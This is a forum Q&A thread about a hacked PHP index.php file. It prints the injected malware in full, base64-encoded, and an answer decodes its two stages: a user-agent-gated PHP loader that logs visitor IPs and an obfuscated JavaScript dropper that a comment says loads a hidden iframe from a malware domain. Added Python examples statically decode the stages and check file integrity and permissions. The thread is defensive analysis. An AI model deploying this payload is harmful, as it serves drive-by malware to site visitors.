2012-09-12 46 views
-5

Can my PHP files, especially an index.php file that redirects with JavaScript like `<script type="text/javascript">window.location="/";</script>`, be hacked?

<script type="text/javascript">window.location="/";</script> 

It gets hacked like this:

<?php eval(base64_decode(
'JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ 
nXTskZGJmPSRkci4nLycubWQ1KCRkci4nMScpOw0KaWYoKHN0cnBvcygkdWEsJ1dpbmRvd3MnKSE9PWZhbHNlKSYmKChzdHJwb3MoJHVhLCdNU0lFJykhPT1 
mYWxzZSl8fChzdHJwb3MoJHVhLCdGaXJlZm94JykhPT1mYWxzZSkpJiYoc3RycG9zKEBmaWxlX2dldF9jb250ZW50cygkZGJmKSwkaXApID09PSBmYWxzZSk 
pew0KCWVycm9yX3JlcG9ydGluZygwKTsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdZV0p5WlNzcmZXTmhkR05vS0dFMlltRXpOSGt 
wZTNSeWVYdHdjbTkwYjNSNWNHVW1NbjFqWVhSamFDaGhjMkZpS1h0bFBYZHBibVJ2ZDFzaVpTSXJJbllpS3lKaGJDSmRPMzE5SUdsbUtERXBlMlk5V3kwMEx 
DMDFMRGt3TERnNUxERTRMREkxTERnM0xEazNMRGcwTERFd05DdzVOU3c0Tml3NU55d3hNRElzTXpFc09UQXNPRGNzTVRBeExEVTJMRGswTERnMkxEazJMRGc 
zTERrMUxERXdNeXd4TURFc05URXNNVEE0TERjd0xEZ3lMRGt3TERZMExEZ3lMRGsyTERnM0xESTFMREkyTERnMExEazJMRGczTERFd055d3lOQ3d5T0N3M05 
5d3pNeXc0TUN3eU55d3hNRGdzTUN3dE5Td3ROaXd0TkN3NU1TdzROeXd4TURFc09ETXNPVFFzT0Rnc01UQXdMREkxTERJNExEUTFMQzB5TEMwMExDMDFMREV 
4TUN3eE9TdzROeXc1TXl3eE1ESXNPRGNzTVRjc01URXdMQzB4TEMwMkxDMDBMQzAxTERnMUxEazRMRGcxTERFd01pdzVOaXc0Tnl3NU5Td3hNRE1zTXpJc01 
UQTBMREV3TVN3NU1Td3hNREVzT0Rnc01qWXNNVGtzTkRjc09URXNPRGNzTVRBeExEZ3pMRGswTERnNExERTRMREV3TUN3eE1ERXNPRFVzTkRZc01qWXNPVEF 
zTVRBeExERXdNeXc1T0N3ME15d3pOQ3d6TXl3eE1ESXNPVElzTVRBM0xERXdOeXc1TkN3NU1pdzVPU3d6TXl3NE55d3hNRGNzTVRBMExEZ3pMRE14TERnMkx 
EazNMRGswTERNMExERXdOQ3c0TkN3ek15dzVPQ3c0T1N3NU9TdzBPU3c0T0N3NU9DdzBOeXd6TlN3eU5pd3hPQ3d4TURRc09USXNPRFlzTVRBeExEa3hMRFE 
zTERJMExETTJMRE0wTERJMExERTVMRGt3TERnMkxEa3lMRGc1TERnNUxERXdNeXcwTnl3eU5Dd3pOaXd6TkN3eU5Dd3hPU3d4TURFc01UQXhMREV3T0N3NU5 
DdzROaXcwT0N3eU5Td3hNRE1zT1RJc01UQXhMRGt3TERnMUxEa3hMRGt6TERreUxERXdNaXd4TURZc05EVXNPVEFzT1RBc09EY3NPRFlzT0RZc09UY3NORFV 
zT1Rjc09UZ3NNVEF4TERrd0xERXdNeXc1TVN3NU5pdzVOeXcwTkN3NE1pdzROU3d4TURFc09UWXNPVFVzTVRBekxERXdNU3c0T0N3ME5TdzVNeXc0T0N3NE9 
Dd3hNREVzTkRVc016UXNORFFzTVRBekxEazNMRGszTERRMUxETTBMRFEwTERJMkxEUTRMRFExTERNMExEa3hMRGczTERFd01TdzRNeXc1TkN3NE9DdzBPQ3d 
4T1N3eU9DdzBOU3d0TWl3dE5Dd3ROU3d4TVRBc01Dd3ROU3d0Tml3NE9Td3hNRE1zT1RVc09EWXNNVEF5TERrd0xEazRMRGsyTERFM0xEa3lMRGc0TERrNUx 
EZzBMRGsxTERnMkxERXdNU3d5Tml3eU5pd3hNVEFzTFRFc0xUWXNMVFFzTFRVc01UQXpMRGcwTERFd01Dd3hOeXc0T1N3eE9DdzBOaXd4T1N3NE5pdzVOaXc 
0Tml3eE1ETXNPVFFzT0Rnc09UWXNNVEF4TERNekxEZzFMRGs1TERnNExEZ3pMREV3TVN3NE9DdzFOU3c1TXl3NE9DdzVOU3c0Tml3NU55d3hNRElzTWpVc01 
qWXNPVEVzT0Rjc01UQXhMRGd6TERrMExEZzRMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXc0Tnl3eE1ERXNOVElzTVRBeUxERXdNU3d4TURFc09URXNPRE1 
zTVRBMExERXdNaXc0Tml3eU55d3lOU3d4TURBc01UQXhMRGcxTERJMExETXhMREkxTERnNUxERXdNeXd4TURJc09UY3NORFVzTXpNc016SXNNVEEwTERreEx 
ERXdOaXd4TURrc09UTXNPVEVzTVRBeExETXlMRGcyTERFd09Td3hNRE1zT0RJc016TXNPRFVzT1RZc09UWXNNek1zTVRBekxEZzJMRE15TERrM0xEa3hMRGs 
0TERRNExEa3dMRGszTERRMkxETTNMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXd4TURJc01UQTJMRGsxTERnM0xETXhMREV3TlN3NU1Td3hNREFzT1RJc09 
EUXNPVEFzT1RVc09URXNNVEF4TERFd09DdzBOeXd5TkN3NU1TdzVNU3c0TlN3NE55dzROeXc1TlN3eU5pdzBOU3c0Tnl3ek15d3hNREVzTVRBeExERXdPQ3c 
1TkN3NE5pd3pNeXc1T0N3NU5pd3hNRElzT1RFc01UQXhMRGt5TERrM0xEazFMRFE0TERJMUxEZ3lMRGcxTERFd01TdzVOaXc1TlN3eE1ETXNNVEF4TERnNEx 
ESTFMRFEwTERnNUxETXlMREV3TUN3eE1ETXNNVEEzTERrekxEZzRMRE15TERrekxEZzRMRGc0TERFd01TdzBPQ3d5TlN3ek15d3lOaXcwTlN3NE55d3pNeXd 
4TURFc01UQXhMREV3T0N3NU5DdzROaXd6TXl3eE1ESXNPVFlzT1Rrc05EY3NNalFzTXpVc01qVXNORFFzT0Rrc016SXNNVEF3TERnNExERXdNaXcxTUN3eE1 
ETXNNVEF5TERrNUxEa3lMRGcwTERFd01pd3hNRE1zT0Rjc01qVXNNallzTVRBMUxEa3dMRGczTERFd01pdzRPU3d5Tml3ek1Dd3lOQ3d6Tml3ek5Dd3lOQ3d 
5T0N3ME5TdzROeXd6TXl3eE1ERXNPRFlzTVRBekxEVXhMREV3TVN3eE1ETXNNVEF3TERrd0xEZzFMREV3TXl3eE1ERXNPRGdzTWpZc01qUXNPVEVzT0Rjc09 
UQXNPVEFzT1RBc01UQXhMREkyTERNd0xESTBMRE0yTERNMExESTBMREk0TERRMUxDMHlMQzAwTEMwMUxDMDJMRGczTERrM0xEZzBMREV3TkN3NU5TdzROaXc 
1Tnl3eE1ESXNNekVzT1RBc09EY3NNVEF4TERVMkxEazBMRGcyTERrMkxEZzNMRGsxTERFd015d3hNREVzTlRFc01UQTRMRGN3TERneUxEa3dMRFkwTERneUx 
EazJMRGczTERJMUxESTJMRGcwTERrMkxEZzNMREV3Tnl3eU5Dd3lPQ3czTnl3ek15dzRNQ3d6TWl3NE1pdzVPU3c1T0N3NE5pdzVOeXc0Tml3MU1pdzVNU3c 
1TVN3NU15dzROeXd5Tml3NE55d3lPQ3cwTlN3dE1pd3ROQ3d0TlN3eE1UQmRPMzEzUFdZN2N6MWJYVHR5UFZOMGNtbHVaenQ0UFNKcUpTSTdabTl5S0drOU1 
Ec3RhU3MxTnpraFBUQTdhU3M5TVNsN2FqMXBPMmxtS0dVbUppZ3dNekU5UFRCNE1Ua3BLWE05Y3l0eUxtWnliMjFEYUdGeVEyOWtaU2dvTVNwM1cycGRLMlV 
vZUNzektTc3hNeWtwTzMwZ2RISjVlMkZ6WjJGelp5WXhNMzFqWVhSamFDaGhjMmRoS1h0bEtITXBPMzA4TDNOamNtbHdkRDQ9JykpOw0KCWlmICgkZnAgPSB 
AZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?> 
<script type="text/javascript">window.location="/";</script> 

Is it because I use $_SERVER["REQUEST_URI"], $_SERVER["HTTP_REFERER"] or some other commands, which need to be stripped with mysql_real_escape_string before executing them?

+2

This is not a question. Can you add more details? –

+2

What is the question here? –

+0

Well, you said it yourself, it can be and it has been hacked... – bogatyrjov

Answers

1

You seem to have an HTML (PHP) block injected into your page. Possibly the result of XSS?

The first stage, decoded, shows:

$ip=$_SERVER["REMOTE_ADDR"];
$dr=$_SERVER["DOCUMENT_ROOT"];
$ua = $_SERVER['HTTP_USER_AGENT'];
$dbf=$dr.'/'.md5($dr.'1'); // hidden per-site file under the document root, used as a visitor log
// only Windows IE/Firefox visitors whose IP is not yet in the log get the payload
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){ 
    error_reporting(0); 
    echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMy
LDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4=')); 
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} // record the IP so each visitor is served once
} 

The second stage, decoded, reveals:

try { 
    abre++ 
} catch (a6ba34y) { 
    try { 
     prototype & 2 
    } catch (asab) { 
     e = window["e" + "v" + "al"]; 
    } 
} 
if (1) { 
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 
102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110]; 
} 
w = f; 
s = []; 
r = String; 
x = "j%"; 
for (i = 0; - i + 579 != 0; i += 1) { 
    j = i; 
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13)); 
} 
try { 
    asgasg & 13 
} catch (asga) { 
    e(s); 
} 

Then there is a further payload behind a JavaScript obfuscation packer. I'll do more research later this afternoon for anyone interested in seeing what this does...

+1

Just to add, you can see what the JS does by replacing the last 'e(s)' with 'alert(s)' and running it. It basically opens a hidden 'iframe' to 'uiyzkjr.ezua.com/vc.php?go=2'. Chrome reports that site as malware, and I'm not going to look at what it does. –
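Both decodes shown in this answer can be reproduced without executing anything, which is the safer route when the payload is known to be malicious. The script below is an added example, not code from the question or the answer: it statically unwraps `eval(base64_decode(...))` layers from PHP source and applies the second stage's character transform to the numeric array. In the decoded loop, `e(x + 3)` is `eval("j%3")`, so each character is simply `w[j] + (j % 3) + 13` and no `eval` or `alert` is needed to recover the text. The regexes, the indicator list, the sample PHP file and its placeholder inner script are constructed here; `F_PREFIX` holds the first 14 numbers of the `f[]` array printed in the answer.

```python
import base64
import re

# Constructed sample (not from the question): a small PHP file carrying the
# same shape of injection, eval(base64_decode(...)) whose decoded first stage
# echoes a second base64-encoded <script>. The inner script is a harmless
# placeholder built here, not the payload from the page.
INNER_JS = "<script>/* constructed placeholder */</script>"
FIRST_STAGE = (
    "$ua=$_SERVER['HTTP_USER_AGENT'];"
    "echo(base64_decode('" + base64.b64encode(INNER_JS.encode()).decode() + "'));"
)
SAMPLE_PHP = (
    "<?php eval(base64_decode('"
    + base64.b64encode(FIRST_STAGE.encode()).decode()
    + "'));?>\n"
    '<script type="text/javascript">window.location="/";</script>\n'
)

# eval(base64_decode('<literal>')) as it appears in the question; the literal may
# be wrapped over several lines, so whitespace is allowed inside it.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)"""
)
# Any further base64_decode('<literal>') inside an already decoded stage.
ANY_B64 = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)""")


def decode_literal(literal):
    """Base64-decode a quoted literal after removing line-wrapping whitespace."""
    return base64.b64decode(re.sub(r"\s+", "", literal)).decode("utf-8", "replace")


def extract_stages(php_source):
    """Statically unwrap eval(base64_decode(...)) layers; nothing is executed."""
    stages = []
    for match in EVAL_B64.finditer(php_source):
        stage = decode_literal(match.group(1))
        stages.append(stage)
        for inner in ANY_B64.finditer(stage):
            stages.append(decode_literal(inner.group(1)))
    return stages


# Strings worth flagging in a decoded stage, with the behaviour each points to
# (constructed list based on what the first stage in the answer does).
INDICATORS = {
    "user-agent gating": "HTTP_USER_AGENT",
    "per-visitor log file": "fopen(",
    "nested payload": "base64_decode(",
    "injected script tag": "<script",
}


def indicators(stages):
    """Names of INDICATORS present in any decoded stage."""
    return {name for stage in stages for name, needle in INDICATORS.items() if needle in stage}


def decode_charcode_array(w):
    """Static equivalent of the second-stage loop: char j is w[j] + (j % 3) + 13.
    (e(x + 3) in the answer is eval("j%3"), so no eval is needed.)"""
    return "".join(chr(w[j] + (j % 3) + 13) for j in range(len(w)))


def encode_charcode_array(text):
    """Inverse transform, used only to build constructed test vectors."""
    return [ord(ch) - (j % 3) - 13 for j, ch in enumerate(text)]


# First 14 numbers of the f[] array in the answer above, used to check the decoder.
F_PREFIX = [-4, -5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102]

if __name__ == "__main__":
    found = extract_stages(SAMPLE_PHP)
    for n, stage in enumerate(found, 1):
        print(f"stage {n}: {stage[:70]}")
    print("indicators:", sorted(indicators(found)))
    print("f[] prefix decodes to:", repr(decode_charcode_array(F_PREFIX)))
```

Run against a real compromised file, `extract_stages(open(path).read())` gives the same two stages the answer shows, and feeding the full 579-element array to `decode_charcode_array` yields the third-stage script as text for reading, never for execution. The `indicators` set is what you would turn into a scanner rule: user-agent gating plus a per-visitor log file is the classic pattern for serving an injected script once per IP so that a site owner reloading the page sees nothing.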

-1

If you are using PHP, just use a header redirect, then you don't have to worry about JavaScript vulnerabilities:

header('Location: http://www.example.com/'); 

This has to come before any content is output to the DOM. If SEO is a factor, you could also consider using an .htaccess redirect.

+1

The question shows PHP code, not JavaScript code, and it isn't a JavaScript vulnerability. – Quentin

2

The problem is that your PHP code itself has been hacked. You can try base64-decoding all that text to see what it is doing, but someone or something had permission to modify your PHP file. JavaScript has nothing to do with it.

If you are running something like WordPress, you can look at what they recommend. First, you need to change all your passwords. Then look at who has been modifying your code. And make sure your files are not writable (e.g., try 755 instead of 777).
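The last answer's two action items, finding out what was modified and making sure files are not world-writable, can be made repeatable with a small integrity check. This is an added example, not code from the answer: a Python script that hashes the web files under a document root into a baseline, reports files changed, added or removed since, and lists anything with the "other" write bit set (the 777 case). The file names, the temporary docroot and the simulated injected line in `demo()` are constructed for illustration.

```python
import hashlib
import os
import stat
import tempfile

# File types worth tracking under a document root (constructed list).
WEB_EXTS = (".php", ".js", ".html", ".htaccess")


def file_sha256(path):
    """SHA-256 of a file, read in chunks so large assets are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map relative path -> SHA-256 for every web file under root."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = file_sha256(full)
    return baseline


def compare_baseline(root, baseline):
    """Files changed, added or removed since the baseline was taken."""
    current = build_baseline(root)
    return {
        "changed": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def world_writable(root):
    """Files and directories whose mode grants write to 'other' (the 777 case)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.stat(full).st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo():
    """Constructed scenario: baseline a tiny docroot, then simulate an injected
    line prepended to index.php and a directory left at 777, and report both."""
    root = tempfile.mkdtemp(prefix="docroot-")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    index = os.path.join(root, "index.php")
    with open(index, "w") as handle:
        handle.write('<?php header("Location: /"); exit; ?>\n')
    notes = os.path.join(uploads, "notes.txt")
    with open(notes, "w") as handle:
        handle.write("constructed sample\n")
    # Explicit modes so the result does not depend on the process umask.
    for path in (uploads, index, notes):
        os.chmod(path, 0o644 if os.path.isfile(path) else 0o755)

    baseline = build_baseline(root)

    # Simulate what happened in the question: something prepends a PHP block.
    with open(index, "r+") as handle:
        body = handle.read()
        handle.seek(0)
        handle.write("<?php /* constructed: simulated injected block */ ?>\n" + body)
    os.chmod(uploads, 0o777)

    return {"diff": compare_baseline(root, baseline), "world_writable": world_writable(root)}


if __name__ == "__main__":
    print(demo())
```

Take the baseline from a known-good copy (a fresh install or a backup from before the injection) and keep it outside the document root; a baseline taken after the compromise only tells you about the next change, not this one. The world-writable listing is the quick check behind "try 755 instead of 777": anything it returns is a path the web server's process, or any other local user, could have rewritten.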
